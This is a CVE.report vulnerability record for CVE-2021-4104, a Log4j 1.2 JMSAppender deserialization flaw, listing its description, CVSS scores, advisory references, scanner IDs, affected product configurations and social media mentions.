CVE-2021-4104

Published on: 12/14/2021 12:00:00 AM UTC

Last Modified on: 04/20/2022 12:16:00 AM UTC

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Certain versions of Log4j from Apache contain the following vulnerability:

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

  • CVE-2021-4104 has been assigned by URL Logo [email protected] to track the vulnerability - currently rated as HIGH severity.
  • Affected Vendor/Software: URL Logo Apache Software Foundation - Apache Log4j 1.x version = 1.2.x

CVSS3 Score: 7.5 - HIGH

Attack
Vector
Attack
Complexity
Privileges
Required
User
Interaction
NETWORK HIGH LOW NONE
Scope Confidentiality
Impact
Integrity
Impact
Availability
Impact
UNCHANGED HIGH HIGH HIGH

CVSS2 Score: 6 - MEDIUM

Access
Vector
Access
Complexity
Authentication
NETWORK MEDIUM SINGLE
Confidentiality
Impact
Integrity
Impact
Availability
Impact
PARTIAL PARTIAL PARTIAL

CVE References

Description Tags Link
Red Hat Customer Portal - Access to 24x7 support and knowledge access.redhat.com
text/html
URL Logo MISC access.redhat.com/security/cve/CVE-2021-4104
Security Advisory psirt.global.sonicwall.com
text/html
URL Logo CONFIRM psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
cve-website www.cve.org
text/html
URL Logo MISC www.cve.org/CVERecord?id=CVE-2021-44228
Oracle Critical Patch Update Advisory - April 2022 www.oracle.com
text/html
URL Logo MISC www.oracle.com/security-alerts/cpuapr2022.html
Oracle Critical Patch Update Advisory - January 2022 www.oracle.com
text/html
URL Logo MISC www.oracle.com/security-alerts/cpujan2022.html
CVE-2021-4104 Apache Log4j Vulnerability in NetApp Products | NetApp Product Security security.netapp.com
text/html
URL Logo CONFIRM security.netapp.com/advisory/ntap-20211223-0007/
oss-security - CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x www.openwall.com
text/html
URL Logo MLIST [oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x
VU#930724 - Apache Log4j allows insecure JNDI lookups www.kb.cert.org
text/html
URL Logo CERT-VN VU#930724
Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2 · GitHub github.com
text/html
URL Logo MISC github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

Related QID Numbers

  • 159573 Oracle Enterprise Linux Security Update for log4j (ELSA-2021-5206)
  • 159603 Oracle Enterprise Linux Security Update for parfait:0.5 (ELSA-2022-0290)
  • 159619 Oracle Enterprise Linux Security Update for log4j (ELSA-2022-9056)
  • 179047 Debian Security Update for apache-log4j1.2 (DLA 2905-1)
  • 198633 Ubuntu Security Notification for Apache Log4j 1.2 Vulnerability (USN-5223-1)
  • 20251 IBM DB2 Security Update for Log4j (6528678)
  • 239973 Red Hat Update for log4j (RHSA-2021:5206)
  • 239980 Red Hat Update for rh-maven36-log4j12 (RHSA-2021:5269)
  • 240034 Red Hat Update for parfait:0.5 (RHSA-2022:0289)
  • 240035 Red Hat Update for parfait:0.5 (RHSA-2022:0290)
  • 240036 Red Hat Update for parfait:0.5 (RHSA-2022:0291)
  • 240059 Red Hat Update for JBoss Enterprise Application Platform 7.4 (RHSA-2022:0436)
  • 240060 Red Hat Update for JBoss Enterprise Application Platform 6.4 (RHSA-2022:0438)
  • 240078 Red Hat Update for red hat jboss web server 3.1 service pack 14 (RHSA-2022:0524)
  • 240209 Red Hat Update for JBoss Enterprise Application Platform 7.4.4 (RHSA-2022:1296)
  • 240210 Red Hat Update for JBoss Enterprise Application Platform 7.4.4 (RHSA-2022:1297)
  • 240452 Red Hat Update for parfait:0.5 (RHSA-2022:0294)
  • 257136 CentOS Security Update for log4j (CESA-2021:5206)
  • 353112 Amazon Linux Security Advisory for log4j : ALAS-2022-1562
  • 353124 Amazon Linux Security Advisory for log4j : ALAS2-2022-1739
  • 376187 Apache Log4j 1.2 Remote Code Execution Vulnerability
  • 376415 IBM WebSphere Application Server Multiple Vulnerabilities (Log4Shell) (6526750)
  • 376425 Oracle Hypertext Transfer Protocol Server (HTTP Server) Multiple Vulnerabilities (Log4Shell) (Doc_ID_2817011.1)
  • 671353 EulerOS Security Update for log4j (EulerOS-SA-2022-1276)
  • 751522 SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4111-1)
  • 751523 SUSE Enterprise Linux Security Update for log4j (SUSE-SU-2021:4115-1)
  • 751524 OpenSUSE Security Update for log4j12 (openSUSE-SU-2021:4112-1)
  • 751525 OpenSUSE Security Update for log4j (openSUSE-SU-2021:4111-1)
  • 751556 OpenSUSE Security Update for log4j12 (openSUSE-SU-2021:1612-1)
  • 87483 Oracle WebLogic Server Multiple Vulnerabilities (Log4Shell) (Doc_ID_2817011.1)
  • 940440 AlmaLinux Security Update for parfait:0.5 (ALSA-2022:0290)

Exploit/POC from Github

Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-20…

Known Affected Configurations (CPE V2.3)

Type Vendor Product Version Update Edition Language
ApplicationApacheLog4j1.2AllAllAll
Operating
System
FedoraprojectFedora35AllAllAll
ApplicationOracleRetail Allocation14.1.3.2AllAllAll
ApplicationOracleRetail Allocation15.0.3.1AllAllAll
ApplicationOracleRetail Allocation16.0.3AllAllAll
ApplicationOracleRetail Allocation19.0.1AllAllAll
ApplicationOracleUtilities Testing Accelerator6.0.0.1.1AllAllAll
ApplicationOracleUtilities Testing Accelerator6.0.0.2.2AllAllAll
ApplicationOracleUtilities Testing Accelerator6.0.0.3.1AllAllAll
ApplicationOracleWeblogic Server12.2.1.3.0AllAllAll
ApplicationOracleWeblogic Server12.2.1.4.0AllAllAll
ApplicationOracleWeblogic Server14.1.1.0.0AllAllAll
ApplicationRedhatCodeready Studio12.0AllAllAll
Operating
System
RedhatEnterprise Linux6.0AllAllAll
Operating
System
RedhatEnterprise Linux7.0AllAllAll
Operating
System
RedhatEnterprise Linux8.0AllAllAll
ApplicationRedhatIntegration Camel K-AllAllAll
ApplicationRedhatIntegration Camel Quarkus-AllAllAll
ApplicationRedhatJboss A-mq6.0.0AllAllAll
ApplicationRedhatJboss A-mq7AllAllAll
ApplicationRedhatJboss A-mq Streaming-AllAllAll
ApplicationRedhatJboss Data Grid7.0.0AllAllAll
ApplicationRedhatJboss Data Virtualization6.0.0AllAllAll
ApplicationRedhatJboss Enterprise Application Platform6.0.0AllAllAll
ApplicationRedhatJboss Enterprise Application Platform7.0AllAllAll
ApplicationRedhatJboss Fuse6.0.0AllAllAll
ApplicationRedhatJboss Fuse7.0.0AllAllAll
ApplicationRedhatJboss Fuse Service Works6.0AllAllAll
ApplicationRedhatJboss Operations Network3.0AllAllAll
ApplicationRedhatJboss Web Server3.0AllAllAll
ApplicationRedhatOpenshift Application Runtimes-AllAllAll
ApplicationRedhatOpenshift Container Platform4.6AllAllAll
ApplicationRedhatOpenshift Container Platform4.7AllAllAll
ApplicationRedhatOpenshift Container Platform4.8AllAllAll
ApplicationRedhatProcess Automation7.0AllAllAll
ApplicationRedhatSingle Sign-on7.0AllAllAll
ApplicationRedhatSoftware Collections-AllAllAll
  • cpe:2.3:a:apache:log4j:1.2:*:*:*:*:*:*:*:
  • cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:retail_allocation:14.1.3.2:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:retail_allocation:15.0.3.1:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:retail_allocation:16.0.3:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:retail_allocation:19.0.1:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.1.1:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.2.2:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.3.1:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:codeready_studio:12.0:*:*:*:*:*:*:*:
  • cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*:
  • cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*:
  • cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:integration_camel_k:-:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:integration_camel_quarkus:-:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_a-mq:7:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_a-mq_streaming:-:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_data_grid:7.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_fuse:7.0.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:jboss_web_server:3.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:openshift_container_platform:4.6:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:openshift_container_platform:4.7:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:openshift_container_platform:4.8:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*:
  • cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*:

Social Mentions

Source Title Posted (UTC)
Twitter Icon @JoergKethur @WildFlyAS new day - another cve - what about the CVE-2021-4104 - RedHats JBoss EAP 7 is affected 2021-12-13 08:57:08
Twitter Icon @JoergKethur @WildFlyAS please also see access.redhat.com/security/cve/C… for the log4J 1.x Versions - if your application server is confi… twitter.com/i/web/status/1… 2021-12-13 10:18:02
Twitter Icon @yazicivo ? CVE-2021-4104 Log4j 1.x vulnerability in JMS appender (requires privileged access to configuration)… twitter.com/i/web/status/1… 2021-12-13 11:07:13
Twitter Icon @ipssignatures The vuln CVE-2021-4104 has a tweet created 0 days ago and retweeted 12 times. twitter.com/yazicivo/statu… #pow1rtrtwwcve 2021-12-13 18:06:02
Twitter Icon @oss_security Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2: Posted by Moritz Bechler o… twitter.com/i/web/status/1… 2021-12-13 21:53:33
Twitter Icon @oss_security CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2: Posted by Ralph Goers on Dec 1… twitter.com/i/web/status/1… 2021-12-13 21:53:34
Twitter Icon @warp10io CVE-2021-4104 | Log4j The class which is the cause of this issue is not included in the distribution of Warp 10. Of… twitter.com/i/web/status/1… 2021-12-14 08:43:49
Twitter Icon @philrandal CVE-2021-4104 is just what I don't need right now #log4j 2021-12-14 10:37:57
Twitter Icon @philrandal RedHat's bulletin: access.redhat.com/security/cve/C… #log4j twitter.com/philrandal/sta… 2021-12-14 10:38:58
Twitter Icon @Sh0ckFR Sources : access.redhat.com/security/cve/C… access.redhat.com/security/cve/C… Et confirmations : bugzilla.redhat.com/show_bug.cgi?i…twitter.com/i/web/status/1… 2021-12-14 11:55:44
Reddit Logo Icon /r/netcve CVE-2021-4104 2021-12-14 11:38:37
Reddit Logo Icon /r/cybersecurity Cve-2021-4104 vs Cve-2021-44228 2021-12-19 02:47:52
Reddit Logo Icon /r/Cisco CVE-2021-4104 - No word from Cisco on this one 2021-12-20 19:53:37
Reddit Logo Icon /r/sysadmin FedEx Ship Manager still has Log4j vulnerability after update. 2022-01-11 00:14:00
Reddit Logo Icon /r/u/detoxtechnologie What Is Log4Shell? The Log4j Vulnerability Explained in 2022 2022-01-25 05:25:17
© CVE.report 2022 Twitter Nitter Twitter Viewer |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

CVE.report and Source URL Uptime Status status.cve.report